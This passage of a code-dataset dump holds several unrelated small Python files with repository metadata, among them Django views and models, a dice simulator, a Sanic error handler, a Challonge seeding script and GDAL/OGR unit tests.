break\n","repo_name":"hongvo2308/learning","sub_path":"Algorithms/searching/binary_tree/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7596720686","text":"from django.shortcuts import render, redirect\nfrom django import views\nfrom books.models import Book, Author, Collection, Editor, Overdue, Category, Library, Overdue\nfrom libraries.models import Library, Bookseller\nfrom books.forms import AddBookForm, AddAuthorForm, AddCategoryForm, AddCollectionForm, AddEditorForm\n\ndef book_index(request):\n overdues = Overdue.objects.all()\n\n context = {\n 'overdues': overdues\n }\n return render(request, 'book/index.html', context)\n\ndef detail_book(request, id):\n book = Book.objects.get(id=id)\n libraries = Library.objects.filter(overdue__book=id, overdue__status='Disponible')\n\n context = {\n 'book': book,\n 'libraries': libraries,\n }\n\n if request.user.is_authenticated:\n if request.user.is_staff:\n bookseller = Bookseller.objects.get(user=request.user)\n library = Library.objects.get(id=bookseller.library.id)\n overdues = Overdue.objects.filter(book=id, library=library.id)\n\n context = {\n 'book': book,\n 'libraries': libraries,\n 'library': library,\n 'bookseller': bookseller,\n 'overdues': overdues,\n }\n\n return render(request, 'book/detail_book.html', context)\n\n return render(request, 'book/detail_book.html', context)\n\ndef author_index(request):\n form = AddAuthorForm()\n authors = Author.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n author = Author(name=name)\n author.save()\n return redirect('books:authors')\n context = {\n 'form': form,\n 'authors': authors\n }\n return render(request, 'author/index.html' , context)\n\ndef editor_index(request):\n form = AddEditorForm()\n editors = Editor.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n editor = Editor(name=name)\n editor.save()\n return redirect('books:editors')\n context = {\n 'form': form,\n 'editors': editors\n }\n return render(request, 'editor/index.html' , context)\n\ndef collection_index(request):\n form = AddCollectionForm()\n collections = Collection.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n collection = Collection(name=name)\n collection.save()\n return redirect('books:collections')\n context = {\n 'form': form,\n 'collections': collections\n }\n return render(request, 'collection/index.html' , context)\n\ndef category_index(request):\n form = AddCategoryForm()\n categories = Category.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n category = Category(name=name)\n category.save()\n return redirect('books:categories')\n context = {\n 'form': form,\n 'categories': categories\n }\n return render(request, 'category/index.html' , context)","repo_name":"louispelarrey/library-django","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23853020212","text":"play = True\r\nwhile play:\r\n sides = int (input(\"\\nHow many sides your dice have? (max 10)\\n\\n\"))\r\n dices = int (input(\"\\nHow many dices you want to roll?\\n\\n\"))\r\n times = int (input(\"\\nHow many times you want to repeat it?\\n\\n\"))\r\n s1 = 0\r\n s2 = 0\r\n s3 = 0\r\n s4 = 0\r\n s5 = 0\r\n s6 = 0\r\n s7 = 0\r\n s8 = 0\r\n s9 = 0\r\n s0 = 0\r\n import random\r\n for x in range (0,times):\r\n for y in range (0,dices):\r\n roll = random.randint(1,sides)\r\n if roll == 1: s1 = s1+1\r\n if roll == 2: s2 = s2+1\r\n if roll == 3: s3 = s3+1\r\n if roll == 4: s4 = s4+1\r\n if roll == 5: s5 = s5+1\r\n if roll == 6: s6 = s6+1\r\n if roll == 7: s7 = s7+1\r\n if roll == 8: s8 = s8+1\r\n if roll == 9: s9 = s9+1\r\n if roll == 10: s0 = s0+1\r\n print (\"\\nYour rolls:\\n1: \" + str(s1) + \"\\n2: \" + str(s2) + \"\\n3: \" + str(s3) + \"\\n4: \" + str(s4) + \"\\n5: \" + str(s5) + \"\\n6: \" + str(s6) + \"\\n7: \" + str(s7) + \"\\n8: \" + str(s8) + \"\\n9: \" + str(s9) + \"\\n10: \" + str(s0) + \"\\n\\n\")\r\n z = str (input(\"\\nDo you want to try again? (y/n)\\n\\n\"))\r\n if z == \"y\": play = True\r\n if z == \"n\": play = False\r\n","repo_name":"KerimcanUzar/probability-simulator","sub_path":"Probability_Simulator.py","file_name":"Probability_Simulator.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14929878689","text":"import random\nprint(\"Welcome to coding , decoding Centre\\nHere you can code your sentence and decode also!!!\")\ncode = str(input(\"Enter your sentence : \"))\n\nwords = code.split(\" \")\nselect = int(input(\"Enter 1 for coding and 2 for decoding : \"))\nif select == 1:\n\tcoding = True\nelse:\n\tcoding = False\nif (coding):\n\tnewwords = []\n\tfor word in words:\n\t\tif len(word) >=3 :\n\t\t\tchars = \"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM\"\n\t\t\t\n\t\t\tr1 = \"\"\n\t\t\tr2 = \"\"\n\t\t\tfor a in range(3):\n\t\t\t\tr1+=random.choice(chars)\n\t\t\tfor a in range(3):\n\t\t\t\tr2+=random.choice(chars)\n\t\t\tcoded = r1 + word[1 : ] + word[0] + r2\n\t\t\tnewwords.append(coded)\n\t\telse:\n\t\t\tnewwords.append(word[::-1])\n\tprint(\" \".join(newwords))\n\t\t\nelse:\n\tnewwords = []\n\tfor word in words:\n\t\tif len(word) >=3 :\n\t\t\tcoded = word[3:-3]\n\t\t\tcoded = coded[-1] + coded [:-1]\n\t\t\tnewwords.append(coded)\n\t\telse:\n\t\t\tnewwords.append(word[::-1])\n\tprint(\" \".join(newwords))\n\t","repo_name":"Kavy47/Codeanddecode.py","sub_path":"secret_code.py","file_name":"secret_code.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29379431579","text":"secadn = input(\"Ingrese una secuenciade ADN: \")\nn = int(input(\"Ingrese el largo: \"))\nsubadn = []\nsubadnfinal = []\nposicionesrepetidas = []\n\nfor i in range(len(secadn)):\n if (i+n) > len(secadn):\n break\n \n subadn.append(secadn[i:i+n])\n\nfor i in range (len(subadn)): #0 1 2 3 \n for j in range (len(subadn)): # 0 1 2 3 , j = vector\n if (i == (len(subadn)-1)-j):\n break\n \n if (subadn[i] == subadn[(len(subadn)-1)-j]):\n posicionesrepetidas.append(i)\n posicionesrepetidas.append((len(subadn)-1)-i)\n\nfor i in range (len(subadn)):\n salto = False\n for j in (posicionesrepetidas):\n if (i == j):\n salto = True\n break\n if (salto):\n continue\n \n else:\n subadnfinal.append(subadn[i])\n\nif (len(subadnfinal) == 0):\n print(\"ninguna\")\n \nif (len(subadnfinal) != 0):\n for i in (subadnfinal):\n print(i)\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej3/hito2_ej3_23b79c6635b1f7ed7094fe3d3084056e.py","file_name":"hito2_ej3_23b79c6635b1f7ed7094fe3d3084056e.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26436455909","text":"from sanic.exceptions import ServerError, NotFound, SanicException\nfrom sanic import response as res\nfrom app import app\nimport logging\nimport datetime\n\nlog = logging.getLogger()\n\n\n@app.exception(NotFound)\nasync def ignore_404(request, exception):\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n\n return res.redirect(\"http://dscvit.com\")\n\n\n@app.exception(ServerError)\nasync def handle_server_exception(request, exception):\n print(\"Inside server error\")\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.redirect(\"http://dscvit.com\")\n\n\n@app.exception(SanicException)\nasync def custom_exception(request, exception):\n print(\"Inside Sanic exception \")\n if exception.status_code == 215:\n res.status_code = 400\n return res.json({\n \"error\": \"Unauthorized\",\n \"status_code\": 215\n }, status=400)\n\n elif exception.status_code == 216:\n return res.json({\n 'error': str(exception),\n 'status_code': 216\n }, status=400)\n\n elif exception.status_code == 217:\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.json({\n 'message': 'Unauthorized',\n 'status_code': 400\n }, status=400)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.redirect(\"http://dscvit.com\")\n","repo_name":"Souldiv/Campaign-Sanic-Server","sub_path":"exceptions/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71867808570","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndataset = pd.read_csv('diabetes.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 8].values\n\nX = pd.DataFrame(X)\ny = pd.DataFrame(y)\n\nX.isna().sum() # No null values\n\n\n\nX.columns = ['Pregnancies', 'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI', 'DiabetesPedigreeFunction', 'Age']\ny.columns = ['Outcome']\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\n# Exporing the Data\nplt.figure(figsize=(18, 8))\n\nfor i, column in enumerate(X.columns):\n plt.subplot(2, 4, i+1)\n sns.distplot(X[column])\n plt.title(f\"Distribution of {column}.\")\n\nplt.tight_layout()\nplt.show()","repo_name":"diop/diabetes-diagnosis-aid","sub_path":"diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1929832186","text":"import os\nimport os.path\nimport signal\nimport contextlib\nimport time\nimport threading\n\n\nclass WatchAlarm(Exception): pass\n\n\n_STOPPED = object()\n_STARTED = object()\n_ENABLED = object()\n\n\nclass BaseWatch(object):\n\n def __init__(self, path):\n self.path = os.path.abspath(path)\n self._state = _STOPPED\n self._changed = False\n self._old_signal_handler = None\n\n @contextlib.contextmanager\n def alarm(self):\n assert self._state is _STARTED, \"not started\"\n self._state = _ENABLED\n try:\n yield\n finally:\n assert self._state is _ENABLED, \"not enabled\"\n self._state = _STARTED\n\n def start(self):\n assert self._state is _STOPPED, \"already started\"\n self._state = _STARTED\n self._old_signal_handler = signal.getsignal(signal.SIGALRM)\n signal.signal(signal.SIGALRM, self._signal_handler)\n self._start()\n\n def stop(self):\n assert self._state is _STARTED, \"already stopped\"\n self._stop()\n signal.signal(signal.SIGALRM, self._old_signal_handler)\n self._old_signal_handler = None\n self._state = _STOPPED\n\n @property\n def changed(self):\n rv = self._changed\n self._changed = False\n return rv\n\n def _start(self):\n raise NotImplementedError\n\n def _stop(self):\n raise NotImplementedError\n\n def _alarm(self):\n if self._state is _ENABLED:\n self._changed = True\n os.kill(os.getpid(), signal.SIGALRM)\n elif self._state is _STARTED:\n self._changed = True\n else:\n assert False, \"not started\"\n\n @staticmethod\n def _signal_handler(signum, frame):\n raise WatchAlarm\n\n def __enter__(self):\n self.start()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n return False\n\n\nclass StatWatch(BaseWatch):\n\n def __init__(self, *args, **kwargs):\n super(StatWatch, self).__init__(*args, **kwargs)\n self._done = True\n self._mtime = None\n self._thread = None\n\n def _target(self):\n while not self._done:\n mtime = os.stat(self.path).st_mtime\n if self._mtime is None:\n self._mtime = mtime\n continue\n elif mtime > self._mtime:\n self._mtime = mtime\n self._alarm()\n time.sleep(.1)\n\n def _start(self):\n self._done = False\n self._thread = threading.Thread(target=self._target)\n self._thread.start()\n\n def _stop(self):\n self._done = True\n self._thread.join()\n self._mtime = None\n self._thread = None\n\n\nwatch_file = StatWatch\n\n","repo_name":"lemon24/intercessor","sub_path":"intercessor/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34561388393","text":"import json\nimport challonge \nimport gspread\n\n# Challonge setup\nchallonge_credentials = json.load(open(\"challonge_credentials.json\"))\nchallonge.set_credentials(challonge_credentials[\"username\"], challonge_credentials[\"private_key\"])\n\n# Google Sheets setup\nsheet_details = json.load(open(\"sheet_details.json\"))\nsa = gspread.service_account(filename=\"credentials.json\")\nsh = sa.open(sheet_details[\"sheet_name\"])\n\nelo_ws = sh.worksheet(sheet_details[\"elo_worksheet\"])\nelo_list = elo_ws.get_all_records()\n\nnames_ws = sh.worksheet(sheet_details[\"player_names_worksheet\"])\nnames_list = names_ws.get_all_records()\n\nelo_dict = {}\nnames_dict = {}\n\nfor player in elo_list :\n elo_dict[player[\"Player Name\"]] = player[\"ELO Score\"]\nfor player in names_list :\n names_dict[player[\"Challonge_ID\"]] = player[\"Player_Name\"]\n\nuser_input = input(\"Enter tournament ID (e.g. 10230) or URL (e.g. 'single_elim' for challonge.com/single_elim). If assigned to a subdomain, URL format must be :subdomain-:tournament_url (e.g. 'test-mytourney' for test.challonge.com/mytourney)\\n\"\n \"You can enter extra options after tournament ID to restrict seeding e.g. top-8 if you want to only seed the 8 highest rated players.\\n\")\ntournament = challonge.tournaments.show(user_input.split(\" \")[0])\n\n# Retrieve the participants\nparticipants = challonge.participants.index(tournament[\"id\"])\n\nprint(\"Preparing to update tournament seeding, there are currently\", len(participants),\"players entered in the tournament\")\n\n# Create a dictionnary to match challonge user id with tournament user id\n# Create a dictionnary to match tournament user name with tournament user id\nchallonge_user_id_dict = {}\nchallonge_user_input_dict = {}\n\nfor p in participants :\n challonge_user_id_dict[p[\"id\"]] = p[\"challonge_user_id\"]\n challonge_user_input_dict[p[\"id\"]] = p[\"name\"]\n \n# Create dictionnaries to access ELO by displayed player name\nelo_dict = {}\nnames_dict = {}\n\nfor player in elo_list :\n elo_dict[player[\"Player Name\"]] = player[\"ELO Score\"]\nfor player in names_list :\n names_dict[player[\"Challonge_ID\"]] = player[\"Player_Name\"]\n \nelo_user_list = []\n\nfor id in challonge_user_id_dict :\n challonge_id = challonge_user_id_dict[id]\n player_name = names_dict.get(challonge_id)\n sheet_elo = elo_dict.get(player_name)\n player_elo = sheet_details[\"unseeded_elo_value\"]\n if sheet_elo :\n player_elo = sheet_elo\n elo_user_list.append({\"id\": id, \n \"elo\": player_elo, \n \"ELO_name\": player_name, \n \"name\": challonge_user_input_dict[id]})\n\ndef eloSort(entry) :\n return entry[\"elo\"]\nelo_user_list.sort(key=eloSort)\n\ndef seedValid(nb_entrants, seed, user_input) :\n if (len(user_input.split(\" \")) > 1) :\n criteria = user_input.split(\" \")[1].split(\"-\")\n if (criteria[0] == \"top\") :\n return seed <= int(criteria[1])\n elif (criteria[0] == \"bottom\") :\n return seed >= nb_entrants - int(criteria[1]) + 1\n return True\n\nfor i in range(0, len(elo_user_list)) :\n if seedValid(len(elo_user_list), len(elo_user_list)-i, user_input) :\n print(\"User\", elo_user_list[i], \"is being seeded\", (len(elo_user_list) - i))\n challonge.participants.update(tournament[\"id\"], elo_user_list[i][\"id\"], \n name=elo_user_list[i][\"name\"], \n seed=(len(elo_user_list) - i))","repo_name":"GSabelette/bnuy-elo","sub_path":"bnuy-seed.py","file_name":"bnuy-seed.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43775039162","text":"# Given a string s, find the length of the longest substring without repeating characters.\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) == 1:\n return 1\n longest = \"\"\n substr = \"\"\n for letter in s:\n findidx = substr.find(letter)\n if findidx == -1:\n substr = substr + letter\n else: \n if len(substr) > len(longest):\n longest = substr\n substr = substr + letter\n substr = substr[findidx+1:]\n \n if len(substr) > len(longest):\n longest = substr\n return len(longest)\n\n \n \n \n \n ","repo_name":"shilpavijay/Algorithms-Problems-Techniques","sub_path":"Puzzles/LongestSubstr.py","file_name":"LongestSubstr.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12924991981","text":"from django.db import models\nfrom datetime import datetime\n\nclass TVShowManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n if len(postData['title']) < 1:\n errors[\"title\"] = \"Title cannot be blank\"\n if len(postData['network']) < 1:\n errors[\"network\"] = \"Network cannot be blank\"\n if len(postData['rel_date']) < 1:\n errors[\"rel_date\"] = \"Release Date cannot be blank\"\n else:\n d1 = datetime.strptime(postData['rel_date'], \"%Y-%m-%d\").date()\n if d1 > datetime.now().date():\n print(\"greater than today\")\n errors[\"future_rel_date\"] = \"Release Date must today or in the past\"\n if len(postData['desc']) > 0 and len(postData['desc']) < 10:\n errors[\"desc\"] = \"Description must be longer than 10 characters if present\"\n return errors\n\nclass Show(models.Model):\n title = models.CharField(max_length=100)\n network = models.CharField(max_length=50)\n release_date = models.DateField()\n description = models.TextField(blank=True)\n objects = TVShowManager()\n\n def __repr__(self):\n return f\"Title: {self.title}, Network: {self.network}, Released: {self.release_date}, Description: {self.description}\"\n","repo_name":"mary-milburn-pearce/first_django","sub_path":"apps/tv/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12324315050","text":"import os\nimport sys\n\nsys.path.append( '../pymod' )\n\nimport gdaltest\nimport ogrtest\nfrom osgeo import gdal\nfrom osgeo import ogr\n\n###############################################################################\n\ndef ogr_basic_1():\n\n gdaltest.ds = ogr.Open( 'data/poly.shp' )\n\n if gdaltest.ds is not None:\n return 'success'\n else:\n return 'fail'\n\n###############################################################################\n# Test Feature counting.\n\ndef ogr_basic_2():\n\n gdaltest.lyr = gdaltest.ds.GetLayerByName( 'poly' )\n\n if gdaltest.lyr.GetName() != 'poly':\n return 'fail'\n if gdaltest.lyr.GetGeomType() != ogr.wkbPolygon:\n return 'fail'\n\n if gdaltest.lyr.GetLayerDefn().GetName() != 'poly':\n return 'fail'\n if gdaltest.lyr.GetLayerDefn().GetGeomType() != ogr.wkbPolygon:\n return 'fail'\n\n count = gdaltest.lyr.GetFeatureCount()\n if count != 10:\n gdaltest.post_reason( 'Got wrong count with GetFeatureCount() - %d, expecting 10' % count )\n return 'fail'\n\n # Now actually iterate through counting the features and ensure they agree.\n gdaltest.lyr.ResetReading()\n\n count2 = 0\n feat = gdaltest.lyr.GetNextFeature()\n while feat is not None:\n count2 = count2 + 1\n feat = gdaltest.lyr.GetNextFeature()\n\n if count2 != 10:\n gdaltest.post_reason( 'Got wrong count with GetNextFeature() - %d, expecting 10' % count2 )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test Spatial Query.\n\ndef ogr_basic_3():\n\n minx = 479405\n miny = 4762826\n maxx = 480732\n maxy = 4763590\n\n ###########################################################################\n # Create query geometry.\n\n ring = ogr.Geometry( type = ogr.wkbLinearRing )\n ring.AddPoint( minx, miny )\n ring.AddPoint( maxx, miny )\n ring.AddPoint( maxx, maxy )\n ring.AddPoint( minx, maxy )\n ring.AddPoint( minx, miny )\n\n poly = ogr.Geometry( type = ogr.wkbPolygon )\n poly.AddGeometryDirectly( ring )\n\n gdaltest.lyr.SetSpatialFilter( poly )\n gdaltest.lyr.SetSpatialFilter( gdaltest.lyr.GetSpatialFilter() )\n gdaltest.lyr.ResetReading()\n\n count = gdaltest.lyr.GetFeatureCount()\n if count != 1:\n gdaltest.post_reason( 'Got wrong feature count with spatial filter, expected 1, got %d' % count )\n return 'fail'\n\n feat1 = gdaltest.lyr.GetNextFeature()\n feat2 = gdaltest.lyr.GetNextFeature()\n\n if feat1 is None or feat2 is not None:\n gdaltest.post_reason( 'Got too few or too many features with spatial filter.' )\n return 'fail'\n\n gdaltest.lyr.SetSpatialFilter( None )\n count = gdaltest.lyr.GetFeatureCount()\n if count != 10:\n gdaltest.post_reason( 'Clearing spatial query may not have worked properly, getting\\n%d features instead of expected 10 features.' % count )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test GetDriver().\n\ndef ogr_basic_4():\n driver = gdaltest.ds.GetDriver()\n if driver is None:\n gdaltest.post_reason( 'GetDriver() returns None' )\n return 'fail'\n\n if driver.GetName() != 'ESRI Shapefile':\n gdaltest.post_reason( 'Got wrong driver name: ' + driver.GetName() )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test attribute query on special field fid - per bug 1468.\n\ndef ogr_basic_5():\n\n gdaltest.lyr.SetAttributeFilter( 'FID = 3' )\n gdaltest.lyr.ResetReading()\n\n feat1 = gdaltest.lyr.GetNextFeature()\n feat2 = gdaltest.lyr.GetNextFeature()\n\n gdaltest.lyr.SetAttributeFilter( None )\n\n if feat1 is None or feat2 is not None:\n gdaltest.post_reason( 'unexpected result count.' )\n return 'fail'\n\n if feat1.GetFID() != 3:\n gdaltest.post_reason( 'got wrong feature.' )\n return 'fail'\n\n return 'success'\n\n\n###############################################################################\n# Test opening a dataset with an empty string and a non existing dataset\ndef ogr_basic_6():\n\n # Put inside try/except for OG python bindings\n try:\n if ogr.Open( '' ) is not None:\n return 'fail'\n except:\n pass\n\n try:\n if ogr.Open( 'non_existing' ) is not None:\n return 'fail'\n except:\n pass\n\n return 'success'\n\n###############################################################################\n# Test ogr.Feature.Equal()\n\ndef ogr_basic_7():\n\n feat_defn = ogr.FeatureDefn()\n feat = ogr.Feature(feat_defn)\n if not feat.Equal(feat):\n return 'fail'\n\n try:\n feat.SetFieldIntegerList\n except:\n return 'skip'\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n return 'fail'\n\n # We MUST delete now as we are changing the feature defn afterwards!\n # Crash guaranteed otherwise\n feat = None\n feat_clone = None\n\n field_defn = ogr.FieldDefn('field1', ogr.OFTInteger)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field2', ogr.OFTReal)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field3', ogr.OFTString)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field4', ogr.OFTIntegerList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field5', ogr.OFTRealList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field6', ogr.OFTStringList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field7', ogr.OFTDate)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field8', ogr.OFTTime)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field9', ogr.OFTDateTime)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field10', ogr.OFTBinary)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field11', ogr.OFTInteger64)\n feat_defn.AddFieldDefn(field_defn)\n\n feat = ogr.Feature(feat_defn)\n feat.SetFID(100)\n feat.SetField(0, 1)\n feat.SetField(1, 1.2)\n feat.SetField(2, \"A\")\n feat.SetFieldIntegerList(3, [1, 2])\n feat.SetFieldDoubleList(4, [1.2, 3.4])\n feat.SetFieldStringList(5, [\"A\", \"B\"])\n feat.SetField(6, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetField(7, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetField(8, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetFieldBinaryFromHexString(9, '012345678ABCDEF')\n feat.SetField(10, 1234567890123)\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n feat.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n geom = ogr.CreateGeometryFromWkt('POINT(0 1)')\n feat_almost_clone.SetGeometry(geom)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n geom = ogr.CreateGeometryFromWkt('POINT(0 1)')\n feat.SetGeometry(geom)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n feat.DumpReadable()\n feat_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFID(99)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(0, 2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(1, 2.2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(2, \"B\")\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldIntegerList(3, [1, 2, 3])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldIntegerList(3, [1, 3])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldDoubleList(4, [1.2, 3.4, 5.6])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldDoubleList(4, [1.2, 3.5])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldStringList(5, [\"A\", \"B\", \"C\"])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldStringList(5, [\"A\", \"D\"])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n for num_field in [6, 7, 8]:\n for i in range(7):\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(num_field, 2010+(i==0), 1+(i==1),\n 8+(i==2), 22+(i==3), 48+(i==4),\n 15+(i==5), 4+(i==6))\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldBinaryFromHexString(9, '00')\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(10, 2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(10, 2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Issue several RegisterAll() to check that OGR drivers are good citizens\n\ndef ogr_basic_8():\n\n ogr.RegisterAll()\n ogr.RegisterAll()\n ogr.RegisterAll()\n\n return 'success'\n\n###############################################################################\n# Test ogr.GeometryTypeToName (#4871)\n\ndef ogr_basic_9():\n\n geom_type_tuples = [ [ ogr.wkbUnknown, \"Unknown (any)\" ],\n [ ogr.wkbPoint, \"Point\" ],\n [ ogr.wkbLineString, \"Line String\"],\n [ ogr.wkbPolygon, \"Polygon\"],\n [ ogr.wkbMultiPoint, \"Multi Point\"],\n [ ogr.wkbMultiLineString, \"Multi Line String\"],\n [ ogr.wkbMultiPolygon, \"Multi Polygon\"],\n [ ogr.wkbGeometryCollection, \"Geometry Collection\"],\n [ ogr.wkbNone, \"None\"],\n [ ogr.wkbUnknown | ogr.wkb25DBit, \"3D Unknown (any)\" ],\n [ ogr.wkbPoint25D, \"3D Point\" ],\n [ ogr.wkbLineString25D, \"3D Line String\"],\n [ ogr.wkbPolygon25D, \"3D Polygon\"],\n [ ogr.wkbMultiPoint25D, \"3D Multi Point\"],\n [ ogr.wkbMultiLineString25D, \"3D Multi Line String\"],\n [ ogr.wkbMultiPolygon25D, \"3D Multi Polygon\"],\n [ ogr.wkbGeometryCollection25D, \"3D Geometry Collection\"],\n [ 123456, \"Unrecognized: 123456\" ]\n ]\n\n for geom_type_tuple in geom_type_tuples:\n if ogr.GeometryTypeToName(geom_type_tuple[0]) != geom_type_tuple[1]:\n gdaltest.post_reason('fail')\n print('Got %s, expected %s' % (ogr.GeometryTypeToName(geom_type_tuple[0]), geom_type_tuple[1]))\n return 'fail'\n\n return 